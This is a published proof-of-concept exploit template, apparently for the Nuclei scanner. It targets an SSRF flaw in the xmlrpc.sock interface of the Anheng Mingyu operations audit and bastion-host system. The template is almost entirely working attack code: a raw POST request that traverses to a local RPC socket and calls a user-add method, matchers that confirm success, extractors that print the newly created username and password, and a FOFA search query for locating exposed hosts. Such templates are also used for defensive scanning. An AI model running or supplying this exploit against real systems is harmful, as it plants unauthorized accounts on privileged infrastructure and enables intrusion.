漏洞描述
There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine
mingyu-xmlrpc-sock-adduser: Mingyu Operation xmlrpc.sock - User Addition
PoC代码[已公开]
id: mingyu-xmlrpc-sock-adduser
info:
name: Mingyu Operation xmlrpc.sock - User Addition
author: SleepingBag945
severity: high
description: |
There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: "明御运维审计与风险控制系统"
tags: mingyu,xmlrpc,sock,intrusive,misconfig,vuln
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
random: "{{rand_base(4)}}"
http:
- raw:
- |
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>10.0.0.1</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>{{username}}</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>{{username}}</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>{{password}}</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>102</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")'
condition: and
extractors:
- type: dsl
dsl:
- '"USERNAME: "+ username'
- '"PASSWORD: "+ password'
# digest: 4a0a0047304502202a0708b9d61a2e5ddeed824dfd0a1697c2f0109c280a088c4fbaaf8904f73a16022100864455e433b78d545b39c60c3b970be7d9a17710221ca3af1cedcc3bb7462860:922c64590222798bb761d5b6d8e72950